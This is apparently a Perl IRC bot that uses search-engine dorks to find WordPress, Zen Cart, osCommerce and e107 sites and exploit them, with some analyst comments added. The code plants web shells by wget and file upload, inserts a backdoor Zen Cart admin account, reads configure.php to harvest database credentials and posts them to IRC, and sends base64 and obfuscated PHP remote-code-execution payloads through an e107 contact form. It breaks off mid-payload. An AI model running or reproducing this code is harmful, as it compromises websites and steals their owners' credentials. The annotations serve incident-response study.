- if ($engine =~ /jackae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAE",$type); } exit; } }
- if ($engine =~ /jackar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAR",$type); } exit; } }
- if ($engine =~ /jackat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAT",$type); } exit; } }
- if ($engine =~ /jackau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAU",$type); } exit; } }
- if ($engine =~ /jackbr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBR",$type); } exit; } }
- if ($engine =~ /jackca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCA",$type); } exit; } }
- if ($engine =~ /jackcl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCL",$type); } exit; } }
- if ($engine =~ /jackcn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCN",$type); } exit; } }
- if ($engine =~ /jackcom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCoM",$type); } exit; } }
- if ($engine =~ /jackcz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCZ",$type); } exit; } }
- if ($engine =~ /jackde/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDE",$type); } exit; } }
- if ($engine =~ /jackdk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDK",$type); } exit; } }
- if ($engine =~ /jackes/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKES",$type); } exit; } }
- if ($engine =~ /jackeu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKEU",$type); } exit; } }
- if ($engine =~ /jackfr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKFR",$type); } exit; } }
- if ($engine =~ /jackhu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKHU",$type); } exit; } }
- if ($engine =~ /jackid/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKID",$type); } exit; } }
- if ($engine =~ /jackil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIL",$type); } exit; } }
- if ($engine =~ /jackin/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIN",$type); } exit; } }
- if ($engine =~ /jackinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKInfO",$type); } exit; } }
- if ($engine =~ /jackir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIR",$type); } exit; } }
- if ($engine =~ /jackit/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIT",$type); } exit; } }
- if ($engine =~ /jackjp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKJP",$type); } exit; } }
- if ($engine =~ /jackkr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKKR",$type); } exit; } }
- if ($engine =~ /jackmx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMX",$type); } exit; } }
- if ($engine =~ /jackmy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMY",$type); } exit; } }
- if ($engine =~ /jacknet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNeT",$type); } exit; } }
- if ($engine =~ /jacknl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNL",$type); } exit; } }
- if ($engine =~ /jackorg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKOrG",$type); } exit; } }
- if ($engine =~ /jackph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPH",$type); } exit; } }
- if ($engine =~ /jackpl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPL",$type); } exit; } }
- if ($engine =~ /jackro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRO",$type); } exit; } }
- if ($engine =~ /jackru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRU",$type); } exit; } }
- if ($engine =~ /jackth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKTH",$type); } exit; } }
- if ($engine =~ /jackua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUA",$type); } exit; } }
- if ($engine =~ /jackuk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUK",$type); } exit; } }
- if ($engine =~ /jackus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUS",$type); } exit; } }
- if ($engine =~ /jacksi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKSI",$type); } exit; } }
- if ($engine =~ /jackbe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBE",$type); } exit; } }
- if ($engine =~ /jackbiz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBIZ",$type); } exit; } }
- }
- if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"GooGLe",$type); } exit; } }
- if ($gps2 ==1) {
- if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"Bing",$type); } exit; } }
- if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"BigLobe",$type); } exit; } }
- if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"WaLLa",$type); } exit; } }
- if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"YaHoo",$type); } exit; } }
- if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AsK",$type); } exit; } }
- if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"UoL",$type); } exit; } }
- if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"OnEt",$type); } exit; } }
- if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"CLusTy",$type); } exit; } }
- if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SaPo",$type); } exit; } }
- if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AoL",$type); } exit; } }
- if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"LyCos",$type); } exit; } }
- if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"HotBot",$type); } exit; } }
- if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SeZNam",$type); } exit; } }
- }
- }
- ###### EXPLOITING #######
- # rfg_exploit($chan, $bugz, $simpan, $dork, $engine) -- analyst annotation, code unchanged.
- # Asks search_engine() for candidate hosts, then for each one fetches a third-party relay
- # page (garguritos.com/rfg.php?url=...) and looks in the reply for a link under
- # wp-content/plugins/radykal-fancy-gallery/admin/ labelled "Your shell".
- # Traces on a targeted WordPress site: requests into that plugin's admin/ directory whose
- # query string carries a wget command, followed by requests for bad.php in the same place.
- # $simpan is accepted but not used here; $thumbshell is defined outside this excerpt.
- sub rfg_exploit() {
- my $chan = $_[0];
- my $bugz = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$rfglogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- # The "Finished" notice goes to the channel when $count equals $num-1.
- if ($count == $num-1) { &msg("$chan","$rfglogo $engine Finished for $dork "); }
- my $test = "http://garguritos.com/rfg.php?url=http://".$site;
- my $html = &get_content($test);
- # Double fork: the parent reaps the first child, which exits at once, so the grandchild
- # that does the per-site work is detached from the main bot process.
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $vpath = "wp-content/plugins/radykal-fancy-gallery/admin/";
- if ($html =~ /<a href=\"http:\/\/(.*)$vpath(.*)\">Your shell/){
- my $vuln = $1; my $qr = $2;
- my $upl = "http://".$vuln.$vpath.$qr."wget%20".$thumbshell;
- my $crut = &get_content($upl);
- # "3xploit" and "stunshell" are marker strings looked for in the responses; presumably
- # the second is the banner of the dropped web shell -- confirm against a sample.
- if ($crut =~ /3xploit/) {
- my $shell = "http://".$vuln.$vpath."bad.php";
- my $check = &get_content($shell);
- if ($check =~ /stunshell/i){
- my $safe = ""; my $os = ""; my $uid = "";
- if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
- if ($check =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
- # The shell URL plus safe-mode/OS/uid details are sent to both the admin nick and the channel.
- &msg("$admin","$rfglogo $engine <=> sHeLL <=> ".$shell." (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$rfglogo $engine <=> sHeLL <=> ".$shell." (SafeMode=$safe) (OS=$os) uid=$uid ");
- } else {
- &msg("$chan","$rfglogo $engine <=> VulN <=> http://".$vuln.$vpath.$qr." 15");
- }
- }
- }
- } exit; }
- }
- }
- }
- # zen_exploit($chan, $bug, $simpan, $dork, $engine) -- analyst annotation, code unchanged.
- # For every host returned by search_engine() it fetches http://<site><bug> and, when the
- # response contains the string "zc_install", hands the URL to zen_query().
- # Defender view: the check only succeeds where a Zen Cart installer directory is still
- # reachable over HTTP; removing zc_install after installation closes this path.
- # $simpan is accepted but not used here.
- sub zen_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$zenlogo $engine Finished for $dork "); }
- my $test = "http://".$site.$bug;
- my $html = &get_content($test);
- # Double fork so the per-site work runs in a detached grandchild process.
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /zc_install/){
- &zen_query($chan,$site,$test,$engine);
- }
- } exit; }
- }
- }
- }
- # zen_query($chan, $url, $test, $engine) -- analyst annotation, code unchanged.
- # POSTs a form field named query_string to $test (3 second timeout). The value is a
- # URL-encoded SQL INSERT into the table "admin" with admin_id 56, admin_name 'adminsys'
- # and admin_email 'admin@mazacrew.co.cc'.
- # Indicators for incident response: an admin row with that id/name/e-mail, and POST
- # bodies starting with "query_string=INSERT" in the web server or WAF logs.
- # $uagent is defined outside this excerpt.
- sub zen_query() {
- my $chan = $_[0];
- my $url = $_[1];
- my $test = $_[2];
- my $engine = $_[3];
- my $code = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email%2C+admin_pass%29+VALUES+%2856%2C%27adminsys%27%2C%27admin%40mazacrew.co.cc%27%2C%27617ec22fbb8f201c366e9848c0eb6925%3A87%27%29%3B";
- my $req = HTTP::Request->new(POST => $test);
- $req->content_type("application/x-www-form-urlencoded");
- $req->content("query_string=".$code);
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(3);
- my $res = $ua->request($req);
- # The whole response (status line, headers and body) is searched for the result text.
- my $data = $res->as_string;
- # "1 statements processed" is reported as VulN; "Duplicate entry" is reported as SuccesS.
- # Both branches announce the site's admin/login.php URL to the channel and the admin nick.
- if ( $data =~ /1 statements processed/i ) {
- &msg("$chan","$zenlogo $engine <=> VulN <=> http://".$url."admin/login.php ");
- &msg("$admin","$zenlogo $engine <=> VulN <=> http://".$url."admin/login.php ");
- }
- elsif ( $data =~ /Duplicate entry/i ) {
- &msg("$chan","$zenlogo $engine <=> SuccesS <=> http://".$url."admin/login.php )");
- &msg("$admin","$zenlogo $engine <=> SuccesS <=> http://".$url."admin/login.php ");
- }
- }
- # osco_exploit($chan, $bug, $simpan, $dork, $engine) -- analyst annotation, code unchanged.
- # For each host it requests three admin scripts (categories.php, file_manager.php,
- # banner_manager.php) with "/login.php" appended as trailing path info, and treats a
- # response containing the matching TABLE_HEADING_* text as an admin page served without login.
- # For each page that answers it then (1) requests ?action=download&filename=/includes/configure.php
- # and passes the URL to osql_xpl() when the reply contains "http://", (2) POSTs the local files
- # ./lobex.jpg and ./mysql.jpg under the names lobex.php and lobexdb.php, and (3) fetches
- # images/lobex.php looking for the banner "UnKnown - Simple Shell".
- # Log indicators: admin/<script>.php/login.php request paths, POSTs with
- # action=new_product_preview / processuploads / insert, and new lobex.php / lobexdb.php
- # files under images/. Restricting the admin directory at the web-server level and
- # running a patched release are the usual mitigations.
- # $simpan is accepted but not used here.
- sub osco_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$oscologo $engine Finished for $dork "); }
- my $cat = "http://".$site."admin/categories.php/login.php";
- my $fm = "http://".$site."admin/file_manager.php/login.php";
- my $bm = "http://".$site."admin/banner_manager.php/login.php";
- my $shell = "http://".$site."images/lobex.php";
- my $dumper = "http://".$site."images/lobexdb.php";
- # All three probes are fetched before forking, so every listed host receives these requests.
- my $coba = &get_content($cat);
- my $cob2 = &get_content($fm);
- my $cob3 = &get_content($bm);
- # Double fork so the per-site work runs in a detached grandchild process.
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- # Branch 1: categories.php
- if ($coba =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/i ) {
- my $test = $cat."?action=download&filename=/includes/configure.php";
- my $cek = &get_content($test);
- if ($cek =~ /http:\/\//) {
- &osql_xpl($test,$chan,$site,$engine);
- }
- my $aplod = LWP::UserAgent->new;
- my $res = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res->as_string;
- my $resa = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa->as_string;
- my $cekap = &get_content($shell);
- if ($cekap =~ /UnKnown - Simple Shell/) {
- my $safe = ""; my $os = ""; my $uid = "";
- if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
- if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
- if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
- &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
- }
- }
- # Branch 2: file_manager.php -- same sequence with the file_1 upload field.
- if ($cob2 =~ /TABLE_HEADING_FILENAME/i) {
- my $test2 = $fm."?action=download&filename=/includes/configure.php";
- my $cek2 = &get_content($test2);
- if ($cek2 =~ /http:\/\//) {
- &osql_xpl($test2,$chan,$site,$engine);
- }
- my $aplod2 = LWP::UserAgent->new;
- my $res2 = $aplod2->post($fm."?action=processuploads",['file_1' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res2->as_string;
- my $resb = $aplod2->post($fm."?action=processuploads",['file_1' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resb->as_string;
- my $cekap = &get_content($shell);
- if ($cekap =~ /UnKnown - Simple Shell/) {
- my $safe = ""; my $os = ""; my $uid = "";
- if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
- if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
- if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
- &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
- }
- }
- # Branch 3: banner_manager.php -- same sequence with the banners_image upload field.
- if ($cob3 =~ /TABLE_HEADING_BANNERS/i) {
- my $test3 = $bm."?action=download&filename=/includes/configure.php";
- my $cek3 = &get_content($test3);
- if ($cek3 =~ /http:\/\//) {
- &osql_xpl($test3,$chan,$site,$engine);
- }
- my $aplod3 = LWP::UserAgent->new;
- my $res3 = $aplod3->post($bm."?action=insert",['banners_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res3->as_string;
- my $resc = $aplod3->post($bm."?action=insert",['banners_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resc->as_string;
- my $cekap = &get_content($shell);
- if ($cekap =~ /UnKnown - Simple Shell/) {
- my $safe = ""; my $os = ""; my $uid = "";
- if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
- if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
- if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
- &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
- }
- }
- } exit;
- }
- }
- }
- }
- # osql_xpl($url, $chan, $site, $engine) -- analyst annotation, code unchanged.
- # GETs $url (10 second timeout) and, on a successful response, pulls the values of the
- # DIR_FS_CATALOG, DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD and DB_DATABASE
- # definitions out of it, posting each one to the IRC channel in clear text.
- # It then derives the host name from http://<site> and calls dbi_connect() and
- # ftp_connect() with the harvested values.
- # Incident response: if a configure.php was readable this way, treat the database
- # credentials, and any FTP or hosting account sharing that password, as disclosed.
- sub osql_xpl() {
- my $url = $_[0];
- my $chan = $_[1];
- my $site = $_[2];
- my $engine = $_[3];
- my $request = HTTP::Request->new(GET=>$url);
- my $browser = LWP::UserAgent->new();
- $browser->timeout(10);
- my $response = $browser->request($request);
- my @dbsinfo;
- if ($response->is_success) {
- my $dpath = ""; my $dbserver = ""; my $dbuser = ""; my $dbpass = ""; my $dbname = "";
- my $res = $response->as_string;
- if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
- $dpath = $1;
- &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DIR path: $dpath");
- }
- if ($res =~ m/'DB_SERVER', '(.*)'/g) {
- $dbserver = $1;
- &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB Server: $dbserver");
- }
- if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
- $dbuser = $1;
- &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB username: $dbuser");
- }
- if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
- $dbpass = $1;
- &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB password: $dbpass");
- }
- if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
- $dbname = $1;
- &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB database: $dbname");
- }
- my $hosts = "http://".$site;
- # Second capture group is the host part of the URL; $host is assigned without "my".
- if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
- $host = $2;
- # The MySQL attempt goes to the web host itself, not to the extracted DB_SERVER value.
- &dbi_connect($host,$dbuser,$dbpass,$dbname,$chan,$engine,$oscologo);sleep(1);
- # The "my $dbuser" below is scoped to this inner block only, so the ftp_connect() call on
- # the next line still receives the full database user name extracted above.
- if ($dbuser =~ /_/) { my @users = split("_",$dbuser); my $dbuser = $users[0]; }
- &ftp_connect($url,$host,$dbuser,$dbpass,$chan,$engine,$oscologo);sleep(1);
- }
- }
- }
- sub e107_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$e107logo $engine Finished for $dork "); }
- my $test = "http://".$site.$bug;
- my $shellz = "http://".$site."/images/lobex.php";
- my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
- my $html = &e107_rce_query($test,$code);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
- my $sys = $1;
- my $upload = "";
- my $res = &e107_rce_query($test);
- if ($res =~ /lobexxx/) {
- my $check = &get_content($shellz);
- if ($check =~ /UnKnown - Simple Shell/) {
- &msg("$chan","$e107logo $engine <=> SheLL <=> $shellz ");sleep(2);
- }
- } else { &msg("$chan","$e107logo $engine <=> System <=> $test ($sys) ");sleep(2); }
- }
- } exit; }
- }
- }
- }
- sub e107_rce_query() {
- my $url = $_[0];
- my $code = encode_base64('echo "lobexxx";')."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";
- my $req = HTTP::Request->new(POST => $url);
- $req->content_type('application/x-www-form-urlencoded');
- $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(7);
- my $res = $ua->request($req);
- return $res->content;
- }
- sub e107_spread_query() {
- my $url = $_[0];
- my $code = "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";
- my $req = HTTP::Request->new(POST => $url);
- $req->content_type('application/x-www-form-urlencoded');
- $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(7);
- my $res = $ua->request($req);
- }
- sub ih_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$ihlogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$ihlogo $engine Finished for $dork "); }
- my $ihxxx = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlU